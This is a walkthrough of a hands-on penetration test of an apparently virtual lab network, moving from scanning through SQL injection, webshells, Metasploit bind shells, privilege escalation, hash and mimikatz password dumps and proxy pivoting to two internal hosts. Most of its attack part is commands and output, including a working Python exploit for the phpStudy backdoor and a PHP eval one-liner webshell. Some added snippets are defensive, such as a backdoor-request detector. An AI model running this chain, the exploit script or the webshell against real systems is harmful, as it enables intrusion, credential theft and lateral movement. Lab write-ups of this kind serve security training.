Comprehensive Penetration Testing Hands-on Project

Table of Contents

1. Project Network Topology

1. Information Gathering

Host discovery with netdiscover

Port and service scanning

Subdomain enumeration

new.cc123.com backend directory scan

Cross-checking the directory structure against what Baidu turns up

ww2.cc123.com directory scan

2. Vulnerability Exploitation

Test site http://new.cc123.com/member/

Logging into the backend

AntSword connects but cannot execute commands

Uploading an ASP big shell and an ASP script to scan for writable directories

Generating a shell with MSF, uploading it and getting a reverse shell

MSF privilege escalation

Test site ww2.cc123.com

Getting flag3

.NET code audit

3. Intranet Penetration

Intranet information gathering

NIC information

Routing information

Hash dump

Using mimikatz to obtain plaintext passwords

Adding a route

Discovering live intranet hosts

Starting a SOCKS proxy

Reading Web.config to obtain credentials

msf generates a bind shell

MSF connects to the bind shell

Database server information gathering

mimikatz password dump

Intranet host scan

Accessing 10.10.1.129:80 through the proxy

phpStudy backdoor exploitation

Writing a Python exploit script for the backdoor

Writing a PHP one-liner webshell

Connecting to the PHP one-liner with AntSword through the proxy

Uploading an msf bind shell

Intranet target machine information gathering


1. Project Network Topology

1. Information Gathering

Host discovery with netdiscover

sudo netdiscover -i eth0 -r 192.168.3.0/24

Port and service scanning

Two tools are used here; one of them is nmap, run with service and OS detection across all 65535 TCP ports (-p-) and the result saved to nmap.a:
kali@ToolsScannerKali20201:~/Desktop$ nmap -A 192.168.3.134 -p- -oN nmap.a
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-05 05:42 EST
Nmap scan report for 192.168.3.134
Host is up (0.00052s latency).
Not shown: 65526 filtered ports
PORT      STATE SERVICE            VERSION
21/tcp    open  ftp                Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp    open  domain             Microsoft DNS 6.1.7601 (1DB1446A) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB1446A)
80/tcp    open  http               Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
135/tcp   open  msrpc              Microsoft Windows RPC
999/tcp   open  http               Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Microsoft-IIS/7.5
|_http-title: phpMyAdmin
3389/tcp  open  ssl/ms-wbt-server?
|_ssl-date: 2021-02-05T10:44:48+00:00; 0s from scanner time.
6588/tcp  open  http               Microsoft IIS httpd 7.5
| http-cookie-flags: 
|   /: 
|     ASPSESSIONIDSQSRBBAD: 
|_      httponly flag not set
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: \xBB\xA4\xCE\xC0\xC9\xF1\xA1\xA4\xD6\xF7\xBB\xFA\xB4\xF3\xCA\xA6 V3.5.1 - \xC7\xB0\xCC\xA8\xB5\xC7\xC2\xBC
49155/tcp open  msrpc              Microsoft Windows RPC
49156/tcp open  msrpc              Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2:sp1

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 227.24 seconds

The host runs DNS (port 53, Microsoft DNS on Windows Server 2008 R2), so we can point our local resolver at this server to resolve the cc123.com names used below. Two other things worth reading out of the scan: port 999 is phpMyAdmin, and the http-title on port 6588 is GBK text that nmap printed as escaped bytes; it decodes to 护卫神·主机大师 V3.5.1 - 前台登录 (the front-end login of the Huweishen Host Master hosting panel), which matches the HwsHostMaster path and the huweishen/MySQL_HWS accounts found later on the box.

Subdomain enumeration

wfuzz virtual-host brute force. The wordlist is injected into the Host header against the web server, and --hw 53 hides responses with 53 words (the default site), so only Host values that return different content remain:

wfuzz -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt -u http://cc123.com -H "Host: FUZZ.cc123.com" --hw 53

new.cc123.com backend directory scan

kali@ToolsScannerKali20201:~/Desktop$ gobuster dir -u http://new.cc123.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://new.cc123.com
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/02/05 07:30:44 Starting gobuster
===============================================================
/images (Status: 301)
/news (Status: 301)
/contact (Status: 301)
/about (Status: 301)
/faq (Status: 301)
/help (Status: 301)
/uploads (Status: 301)
/data (Status: 301)
/a (Status: 301)
/Images (Status: 301)
/News (Status: 301)
/member (Status: 301)
/FAQ (Status: 301)
/special (Status: 301)
/m (Status: 301)
/Contact (Status: 301)
/About (Status: 301)
/install (Status: 301)
/Help (Status: 301)
/plus (Status: 301)
/A (Status: 301)
/M (Status: 301)
/include (Status: 301)
/cp (Status: 301)
/NEWS (Status: 301)
/skin (Status: 301)
/case (Status: 301)
/INSTALL (Status: 301)
/CP (Status: 301)
/IMAGES (Status: 301)
/Data (Status: 301)
/Special (Status: 301)
/Uploads (Status: 301)
/Member (Status: 301)
/Faq (Status: 301)
/Install (Status: 301)
/CONTACT (Status: 301)
/Include (Status: 301)
/ABOUT (Status: 301)
/HELP (Status: 301)
/DATA (Status: 301)
/CASE (Status: 301)
/Skin (Status: 301)
/Case (Status: 301)
===============================================================
2021/02/05 07:31:13 Finished
===============================================================

 

可以参考百度得目录结构

ww2.cc123.com目录扫描

 

2. Vulnerability Exploitation

Test site http://new.cc123.com/member/

Adding a category in the member area triggers SQL injection, and the admin credentials are pulled out of the database through it.

The extracted hash is obviously the wrong length for a plain MD5: a full MD5 digest is always 32 hex characters (an even count). The value below is only 20 characters, a window cut out of the digest, so it has to be cracked as a truncated MD5.

812df726be884ddcfc41 cracks to admin7788
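Cracking such a truncated hash is a small twist on ordinary MD5 cracking, as shown by this added example (not code from the original write-up). Several PHP CMS backends store only a 20-character window of the digest, commonly substr(md5(pw), 5, 20); rather than assuming the offset, the function searches every offset of each candidate's full digest and reports where the fragment was found, so the storage scheme is learned along with the password. The wordlist is constructed for the demo; on a real job pass the lines of a wordlist file.

```python
# Added example: cracking a truncated MD5 such as the 20-character value above.
# Not code from the original write-up. SAMPLE_WORDLIST is constructed for the
# demo; in practice pass the lines of a real wordlist (one candidate per line).
import hashlib
from typing import Iterable, Optional, Tuple


def md5_hex(word: str) -> str:
    """Full 32-character hex MD5 of a candidate password."""
    return hashlib.md5(word.encode("utf-8")).hexdigest()


def crack_truncated_md5(fragment: str,
                        wordlist: Iterable[str]) -> Optional[Tuple[str, int]]:
    """Find a candidate whose full MD5 contains `fragment`.

    Returns (password, offset) for the first hit, or None. Searching every
    offset instead of assuming substr(md5, 5, 20) means the same function
    cracks any window of the digest and tells you which window the CMS stores.
    """
    fragment = fragment.strip().lower()
    if (not fragment or len(fragment) > 32
            or any(c not in "0123456789abcdef" for c in fragment)):
        raise ValueError("fragment must be 1..32 hex characters")
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")  # file lines keep their newline
        if not candidate:
            continue
        offset = md5_hex(candidate).find(fragment)
        if offset != -1:
            return candidate, offset
    return None


# Constructed wordlist for the demo (not data from the page).
SAMPLE_WORDLIST = ["123456", "admin", "password", "admin7788", "qwerty123"]

if __name__ == "__main__":
    # Build a 20-character window the way a substr(md5, 5, 20) backend would,
    # then recover the password and the offset from it.
    fragment = md5_hex("password")[5:25]
    print(fragment, "->", crack_truncated_md5(fragment, SAMPLE_WORDLIST))
```

The offset returned for the constructed fragment is 5, i.e. the substr(md5, 5, 20) layout; when cracking a real dump, that offset tells you how to feed the hash to hashcat or john if you want to move beyond a small Python loop.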

Log into the backend with the recovered credentials.

Upload a PHP one-liner to obtain a webshell.

AntSword connects to it but cannot execute commands.

So we upload an ASP big shell again, together with an ASP script that scans for writable directories.

Generate a payload with MSF, upload it and get a reverse shell.

MSF privilege escalation

Check for local privilege escalation vulnerabilities: background the session and run the exploit suggester against it.

meterpreter > background 
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester 
msf5 post(multi/recon/local_exploit_suggester) > set session 1
msf5 post(multi/recon/local_exploit_suggester) > run

shell

chcp 65001   // switch the console code page to UTF-8 so Chinese output is not garbled

flag1

flag2

Test site ww2.cc123.com

kali@ToolsScannerKali20201:~/Desktop$ gobuster dir -u http://ww2.cc123.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "aspx,html"
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://ww2.cc123.com
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     aspx,html
[+] Timeout:        10s
===============================================================
2021/02/05 08:50:39 Starting gobuster
===============================================================
/admin (Status: 301)
/index.aspx (Status: 200)
/index.html (Status: 200)
/product.aspx (Status: 200)
/product.html (Status: 200)
/News.aspx (Status: 200)
/News.html (Status: 200)
/template (Status: 301)
/About.aspx (Status: 200)
/About.html (Status: 200)
/Index.aspx (Status: 200)
/Index.html (Status: 200)
/style (Status: 301)
/about.aspx (Status: 200)
/about.html (Status: 200)
[ERROR] 2021/02/05 08:50:58 [!] Get http://ww2.cc123.com/messages.html: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
/editor (Status: 301)
/message.aspx (Status: 200)
/message.html (Status: 200)
/stat.aspx (Status: 200)
/NEWS.aspx (Status: 200)
/NEWS.html (Status: 200)
/index_html (Status: 200)
/index_html.aspx (Status: 200)
/index_html.html (Status: 200)
[ERROR] 2021/02/05 08:51:09 [!] Get http://ww2.cc123.com/Product.html: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
/news2.html (Status: 200)
/news1.html (Status: 200)
/uc (Status: 301)
/INDEX.aspx (Status: 200)
/INDEX.html (Status: 200)
/Admin (Status: 301)
/Template (Status: 301)
/news3.html (Status: 200)
/about1.html (Status: 200)
/news01.html (Status: 200)
/Message.aspx (Status: 200)
/Message.html (Status: 200)
/about2.html (Status: 200)
/Style (Status: 301)
/news11.html (Status: 200)
/news4.html (Status: 200)
/news03.html (Status: 200)
/news5.html (Status: 200)
/upimg (Status: 301)
/Messages.html (Status: 200)
/news06.html (Status: 200)
/news02.html (Status: 200)
/news04.html (Status: 200)
/news12.html (Status: 200)
/about3.html (Status: 200)
/news10.html (Status: 200)
/news16.html (Status: 200)
/product1.html (Status: 200)
/news8.html (Status: 200)
/news17.html (Status: 200)
/news15.html (Status: 200)
/news9.html (Status: 200)
/STYLE (Status: 301)
/news23.html (Status: 200)
/news7.html (Status: 200)
/news13.html (Status: 200)
/news05.html (Status: 200)
/News2.html (Status: 200)
/news6.html (Status: 200)
/news20.html (Status: 200)
/news21.html (Status: 200)
/news14.html (Status: 200)
/news25.html (Status: 200)
/Editor (Status: 301)
/product3.html (Status: 200)
/product2.html (Status: 200)
/ABOUT.aspx (Status: 200)
/ABOUT.html (Status: 200)
/UC (Status: 301)
/news18.html (Status: 200)
/news19.html (Status: 200)
/PRODUCT.aspx (Status: 200)
/PRODUCT.html (Status: 200)
/news22.html (Status: 200)
/news28.html (Status: 200)
/News1.html (Status: 200)
/news003.html (Status: 200)
/about4.html (Status: 200)
/news001.html (Status: 200)
/news48.html (Status: 200)
/news30.html (Status: 200)
/news26.html (Status: 200)
/product02.html (Status: 200)
/news55.html (Status: 200)
/news07.html (Status: 200)
/news09.html (Status: 200)
/news29.html (Status: 200)
/TEMPLATE (Status: 301)
===============================================================
2021/02/05 09:01:13 Finished
===============================================================
http://ww2.cc123.com/admin   admin backend
http://ww2.cc123.com/editor  editor

The login form of the admin backend is SQL-injectable: the username is concatenated into the query, so the password comparison can be commented out and the query still returns the admin row.

The login check is presumably a query of the following form, with the injected username admin'-- cutting off the password condition (the + is the URL-encoded space needed when the payload travels in a GET parameter; in a POSTed form a literal space after -- does the same job):
select * from user where username = 'admin'--+' and password = *****
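To make the bypass concrete, here is an added example (not code from the original write-up) that runs the injected query against an in-memory SQLite table and compares it with a parameterised version. The table name user, the MD5 password column and the admin row are assumptions for the demo; the real backend was MSSQL, but the -- comment behaves the same way in both.

```python
# Added example: the login bypass sketched above, run against a constructed
# SQLite table. Not code from the original write-up; table layout and the
# stored admin password are assumptions for the demo.
import hashlib
import sqlite3


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def build_demo_db() -> sqlite3.Connection:
    """Constructed sample table; the attacker never learns the real password."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id INTEGER PRIMARY KEY, "
                 "username TEXT, password TEXT)")
    conn.execute("INSERT INTO user (username, password) VALUES (?, ?)",
                 ("admin", md5_hex("S3cret!2021")))
    conn.commit()
    return conn


def render_vulnerable_query(username: str, password: str) -> str:
    """The string-concatenated query the vulnerable login is assumed to build."""
    return ("SELECT id FROM user WHERE username = '%s' AND password = '%s'"
            % (username, md5_hex(password)))


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # username = "admin'-- " closes the string and comments out the rest of the
    # WHERE clause, so the password check never runs and the admin row matches.
    sql = render_vulnerable_query(username, password)
    return conn.execute(sql).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Bound parameters: the quote and the comment marker are data, not SQL.
    row = conn.execute("SELECT id FROM user WHERE username = ? AND password = ?",
                       (username, md5_hex(password))).fetchone()
    return row is not None


BYPASS_USERNAME = "admin'-- "  # the payload form used against the login box above

if __name__ == "__main__":
    db = build_demo_db()
    print(render_vulnerable_query(BYPASS_USERNAME, "anything"))
    print("vulnerable login:", login_vulnerable(db, BYPASS_USERNAME, "anything"))
    print("parameterised:   ", login_safe(db, BYPASS_USERNAME, "anything"))
```

The vulnerable function logs the attacker in with any password, the parameterised one does not, and the printed query shows exactly what the database saw: everything after -- is a comment.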

The parameter used when editing information in the backend is also SQL-injectable.

sqlmap -r sqlpost.txt --batch

Getting a shell with sqlmap. The backend is MSSQL, so tell sqlmap the DBMS; --os-shell relies on xp_cmdshell, which needs a privileged database login:

sudo sqlmap -r sqlpost.txt --dbms=mssql -v 1 --dbs
sudo sqlmap -r sqlpost.txt --dbms=mssql -v 1 --os-shell

The IP seen from the os-shell is 10.10.1.128, which shows that this machine is the intranet database server: the web site and the database run on separate hosts.

Get flag3

.NET code audit

Download the site's bin directory, which holds the compiled .NET assemblies of the ww2 site and can be decompiled for review:

meterpreter > download c:/HwsHostMaster/wwwroot/ww2cc123_55m39g/web/bin

3. Intranet Penetration

Intranet information gathering

NIC information

meterpreter > ipconfig

Interface  1
============
Name         : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU          : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface 11
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:71:98:af
MTU          : 1500
IPv4 Address : 192.168.3.134
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::c1e2:d216:9dad:969b
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface 12
============
Name         : Microsoft ISATAP Adapter
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280
IPv6 Address : fe80::5efe:c0a8:386
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface 13
============
Name         : Intel(R) PRO/1000 MT Network Connection #2
Hardware MAC : 00:0c:29:71:98:b9
MTU          : 1500
IPv4 Address : 10.10.10.135
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::2c1c:e958:d8c2:1189
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface 14
============
Name         : Microsoft ISATAP Adapter #2
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280
IPv6 Address : fe80::5efe:a0a:a87
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff

Two NICs, two addresses:

192.168.3.134 (the external interface we came in through) / 10.10.10.135 (the internal 10.10.10.0/24 segment)

Routing information

meterpreter > run get_local_subnets

Two subnets are reported.

Hash dump

meterpreter > run hashdump 

[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 20401422a21274279449907862e9d520...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...


Administrator:500:aad3b435b51404eeaad3b435b51404ee:1c933df09b600efabee0791aaccc43f2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
MySQL_HWS:1001:aad3b435b51404eeaad3b435b51404ee:6a75a75e4cfd3cf00faf743e17e90a53:::
PhpMyAdmin_HWS:1002:aad3b435b51404eeaad3b435b51404ee:a14b615c584d6b043f42f1cfab9779cd:::
huweishen542147:1004:aad3b435b51404eeaad3b435b51404ee:c76eea2615348c5228f7027d3ccab02d:::
cc123:1005:aad3b435b51404eeaad3b435b51404ee:afdeb425b4a55982deb4e80fa3387576:::
newcc123:1007:aad3b435b51404eeaad3b435b51404ee:97824315153b4dd665d6c688f446ebf1:::
ww2cc123:1008:aad3b435b51404eeaad3b435b51404ee:adadf2dd832421c26a96705fd09a32bd:::

Using mimikatz to obtain plaintext passwords

migrate 1500

Migrate into another process first (PID 1500 here). mimikatz reads LSASS, so the meterpreter must match the OS architecture (64-bit here) and run with SYSTEM rights, otherwise the password dump errors out.

load mimikatz
mimikatz_command -f samdump::hashes
mimikatz_command -f sekurlsa::searchPasswords
wdigest
tspkg

The legacy mimikatz extension used here is deprecated in Metasploit 5 (load kiwi and creds_all are the current equivalent). The wdigest/tspkg providers return the cleartext credentials:

0;6131477   NTLM       WIN-KALKEMT3JMA  cc123             Ht6_ifp6nvkjn
0;14708785  NTLM       WIN-KALKEMT3JMA  newcc123          ZtKGmDj0qEbDECSBl5p
0;8663175   NTLM       WIN-KALKEMT3JMA  newcc123          ZtKGmDj0qEbDECSBl5p
0;771729    NTLM       WIN-KALKEMT3JMA  Administrator     !@#Qwe123.

Adding a route

run autoroute -s 10.10.10.0/24

This tells Metasploit to send traffic for 10.10.10.0/24 through the meterpreter session; the scanner modules, the bind-shell handler and the SOCKS proxy below all depend on it.

Discovering live intranet hosts

MSF intranet host discovery: an ARP scan of the 10.10.10.0/24 segment run from the meterpreter session

meterpreter > run post/windows/gather/arp_scanner rhosts=10.10.10.0/24

[*] Running module against WIN-KALKEMT3JMA
[*] ARP Scanning 10.10.10.0/24
[+]     IP: 10.10.10.1 MAC 00:50:56:c0:00:13 (VMware, Inc.)
[+]     IP: 10.10.10.135 MAC 00:0c:29:71:98:b9 (VMware, Inc.)
[+]     IP: 10.10.10.136 MAC 00:0c:29:43:9b:46 (VMware, Inc.)
[+]     IP: 10.10.10.254 MAC 00:50:56:eb:d5:a8 (VMware, Inc.)
[+]     IP: 10.10.10.255 MAC 00:0c:29:71:98:b9 (VMware, Inc.)
meterpreter > background 
[*] Backgrounding session 2...

Reading the result: 10.10.10.135 is our own foothold (its second NIC, MAC 00:0c:29:71:98:b9, which also answers for the broadcast address .255), and 10.10.10.1 and 10.10.10.254 carry VMware host-side MACs (00:50:56:...) belonging to the virtual network itself, so the only new machine in this segment is 10.10.10.136.

Port scan

msf5 > use auxiliary/scanner/portscan/tcp 
msf5 auxiliary(scanner/portscan/tcp) > set RHOSTS 10.10.10.135
msf5 auxiliary(scanner/portscan/tcp) > exploit 

[+] 10.10.10.135:         - 10.10.10.135:21 - TCP OPEN
[+] 10.10.10.135:         - 10.10.10.135:53 - TCP OPEN
[+] 10.10.10.135:         - 10.10.10.135:80 - TCP OPEN
[+] 10.10.10.135:         - 10.10.10.135:139 - TCP OPEN
[+] 10.10.10.135:         - 10.10.10.135:135 - TCP OPEN
[+] 10.10.10.135:         - 10.10.10.135:445 - TCP OPEN
[+] 10.10.10.135:         - 10.10.10.135:999 - TCP OPEN
^C[*] 10.10.10.135:         - Caught interrupt from the console...
[*] Auxiliary module execution completed

Note that this scan targets 10.10.10.135, the internal interface of the host we already control, so it only confirms our own services: the same 21/53/80/135/999 seen from outside, plus 139 and 445, which the external nmap scan reported as filtered and which are therefore reachable only from the internal segment. The real next target, 10.10.10.136, is scanned through the SOCKS proxy set up below.

Starting a SOCKS proxy

msf5 > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > set srvport 2222
msf5 auxiliary(server/socks4a) > options
msf5 auxiliary(server/socks4a) > run

nmap scan through the proxy

Point proxychains at the listener (a line socks4 127.0.0.1 2222 in /etc/proxychains.conf), then scan. -sT and -Pn are mandatory: a SOCKS proxy only relays TCP connections, so SYN scans and ICMP/ARP host discovery cannot pass through it. Expect it to be slow (the default 1000-port scan below took 1066 s); narrow the port list with -p when time matters.

sudo vim /etc/proxychains.conf
sudo proxychains nmap -sT -Pn 10.10.10.136

Nmap scan report for 10.10.10.136
Host is up (1.1s latency).
Not shown: 988 closed ports
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1433/tcp  open  ms-sql-s
2383/tcp  open  ms-olap4
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 1066.56 seconds

The shell obtained via sqlmap is not interactive, so we go back through the earlier ASPX big shell, connect to the database with it, and upload a bind shell to connect to instead.

Reading Web.config to obtain the database credentials

<add key="ConnectionString" value="server=WIN-JJU7KU45PN7;database=grcms_data;uid=sa;pwd=!@#a123.." />

The connection string gives the database server's hostname (WIN-JJU7KU45PN7) and the sa login, the MSSQL sysadmin account, which is what makes xp_cmdshell and the os-shell above possible.

msf generates a bind shell

A bind payload is used rather than a reverse one: the database server sits on 10.10.10.0/24, reachable only through the route added to the meterpreter session, and it cannot reach Kali's 192.168.3.0/24 directly, so the handler has to connect to it through the pivot instead of waiting for a callback.

msfvenom -p windows/meterpreter/bind_tcp lport=54321 -f exe > shell.exe

Upload the bind shell and run it.

MSF connects to the bind shell

use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 10.10.10.136
set lport 54321
run

Database server information gathering

Hash collection (hashdump on 10.10.10.136):

Administrator:500:aad3b435b51404eeaad3b435b51404ee:15132c3d36a7e5d7905e02b478979046:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

mimikatz password dump, followed by the server's interfaces and local subnets:

[0] { Administrator ; WIN-JJU7KU45PN7 ; !@#QWEasd123. }
[1] { Administrator ; WIN-JJU7KU45PN7 ; !@#QWEasd123. }
[2] { WIN-JJU7KU45PN7 ; Administrator ; !@#QWEasd123. }
IPv4 Address : 10.10.1.128
IPv4 Netmask : 255.255.255.0
IPv4 Address : 10.10.10.136
IPv4 Netmask : 255.255.255.0

Local subnet: 10.10.1.0/255.255.255.0
Local subnet: 10.10.10.0/255.255.255.0

Intranet host scan

The database server has a second NIC on 10.10.1.0/24, so add that route through the new session and ARP-scan the segment:

run autoroute -s 10.10.1.0/24
run post/windows/gather/arp_scanner rhosts=10.10.1.0/24

Target IP 10.10.1.129

Port scan (auxiliary/scanner/portscan/tcp against 10.10.1.129):

[+] 10.10.1.129:          - 10.10.1.129:80 - TCP OPEN
[+] 10.10.1.129:          - 10.10.1.129:135 - TCP OPEN
[+] 10.10.1.129:          - 10.10.1.129:139 - TCP OPEN
[+] 10.10.1.129:          - 10.10.1.129:445 - TCP OPEN
[+] 10.10.1.129:          - 10.10.1.129:3306 - TCP OPEN

Accessing 10.10.1.129:80 through the proxy

proxychains firefox http://10.10.1.129

phpStudy backdoor exploitation

The site runs on phpStudy. The trojaned php_xmlrpc.dll bundled with the affected phpStudy releases executes PHP code that arrives base64-encoded in the Accept-Charset header when Accept-Encoding is gzip,deflate, which is exactly what the script below sends.

Writing a Python exploit script for the backdoor

# coding: utf-8
# phpStudy backdoor: the PHP code goes base64-encoded in Accept-Charset and
# Accept-Encoding must be gzip,deflate.  Usage: python3 phpstudayexp.py "<cmd>"

import requests
import sys
import base64

if len(sys.argv) != 2:
    print("usage: %s <command>" % sys.argv[0])
    sys.exit(1)

# Wrap the command in system() so its output comes back in the response body.
shell = "system('" + sys.argv[1] + "');"
shell_base64 = base64.b64encode(shell.encode('utf-8')).decode('ascii')

header = {'Accept-Charset': shell_base64, 'Accept-Encoding': 'gzip,deflate'}


def exploit(url):
    # Plain GET against the index page; proxychains takes care of the SOCKS pivot.
    html = requests.get(url=url, headers=header, timeout=30).text
    return html


url = "http://10.10.1.129/"
print(exploit(url))

Writing a PHP one-liner webshell (the ^ characters escape < and > for cmd.exe so they are written literally instead of being treated as redirection):

proxychains python3 ./phpstudayexp.py "echo ^<?php @eval(\$_POST[\"shell\"])?^>>c:\phpstudy\WWW\shell.php"
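The defensive counterpart of the exploit script above, as an added example that is not part of the original write-up: a detector that decodes the Accept-Charset header of each request and flags it when the decoded text is PHP code calling an execution function. The request samples are constructed for the demo; the header layout (base64 PHP in Accept-Charset, Accept-Encoding gzip,deflate) is the one the exploit script sends. Legitimate Accept-Charset values contain commas, spaces and semicolons that strict base64 decoding rejects, which is what keeps the false-positive rate low.

```python
# Added example: detecting phpStudy backdoor triggers in request headers.
# Not code from the original write-up; SAMPLE_REQUESTS is constructed.
import base64
import binascii
import re
from typing import Dict, List, Optional, Tuple

# PHP calls that never belong in a character-set negotiation header.
_PHP_EXEC = re.compile(
    r"\b(system|exec|passthru|shell_exec|eval|assert|popen|proc_open)\s*\(", re.I)


def decode_accept_charset(value: str) -> Optional[str]:
    """Return the decoded text if the header is strict base64 UTF-8, else None."""
    try:
        raw = base64.b64decode(value.strip(), validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        return raw.decode("utf-8")
    except UnicodeDecodeError:
        return None


def is_phpstudy_backdoor_request(headers: Dict[str, str]) -> Tuple[bool, Optional[str]]:
    """Flag a request whose Accept-Charset decodes to PHP code.

    Returns (flagged, decoded_payload). The published exploit also sends
    Accept-Encoding: gzip,deflate; that is deliberately not required here so
    a variant with a different encoding header is not missed.
    """
    lowered = {k.lower(): v for k, v in headers.items()}
    charset = lowered.get("accept-charset")
    if charset is None:
        return False, None
    payload = decode_accept_charset(charset)
    if payload is not None and _PHP_EXEC.search(payload):
        return True, payload
    return False, payload


def make_backdoor_headers(cmd: str) -> Dict[str, str]:
    """Build the same two headers the exploit script sends (for the sample)."""
    php = "system('%s');" % cmd
    return {"Accept-Charset": base64.b64encode(php.encode("utf-8")).decode("ascii"),
            "Accept-Encoding": "gzip,deflate"}


# Constructed sample traffic: two ordinary requests and one backdoor trigger.
SAMPLE_REQUESTS: List[Dict[str, str]] = [
    {"Host": "10.10.1.129", "Accept-Encoding": "gzip, deflate, br",
     "User-Agent": "Mozilla/5.0"},
    {"Host": "10.10.1.129", "Accept-Charset": "utf-8, iso-8859-1;q=0.5",
     "Accept-Encoding": "gzip,deflate"},
    dict(make_backdoor_headers("whoami"), Host="10.10.1.129"),
]


def scan_requests(requests: List[Dict[str, str]]) -> List[Tuple[int, str]]:
    """Return (index, decoded PHP) for every request that trips the detector."""
    hits = []
    for i, hdrs in enumerate(requests):
        flagged, payload = is_phpstudy_backdoor_request(hdrs)
        if flagged:
            hits.append((i, payload))
    return hits


if __name__ == "__main__":
    for idx, code in scan_requests(SAMPLE_REQUESTS):
        print("request %d: backdoor trigger, PHP = %s" % (idx, code))
```

Only the third sample is flagged, and the decoded payload (system('whoami');) is returned with it, which is the string a responder wants in the alert. The same check can be run over a web-server access log if the log format records request headers, or added as a WAF rule keyed on a base64-decodable Accept-Charset.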

Connecting to the PHP one-liner with AntSword through the proxy

Change the proxy address

AntSword runs on the physical host, so its SOCKS proxy setting must use Kali's IP (where the msf socks4a server is listening on port 2222), not the 127.0.0.1 used in Kali's /etc/proxychains.conf; otherwise the proxy connection from the physical host fails.

Upload an msf bind shell to 10.10.1.129 and connect to it through the route, as was done for the database server.

Intranet target machine information gathering

Administrator:500:aad3b435b51404eeaad3b435b51404ee:15132c3d36a7e5d7905e02b478979046:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

meterpreter > mimikatz_command -f samdump::hashes
Ordinateur : target
BootKey    : 317aebcebbff049827a6e7f1c7c8bc2e

Rid  : 500
User : Administrator
LM   : 
NTLM : 15132c3d36a7e5d7905e02b478979046

Rid  : 501
User : Guest
LM   : 
NTLM : 
meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { Administrator ; TARGET ; !@#QWEasd123. }
[1] { TARGET ; Administrator ; !@#QWEasd123. }
[2] { Administrator ; TARGET ; !@#QWEasd123. }
 

 

 
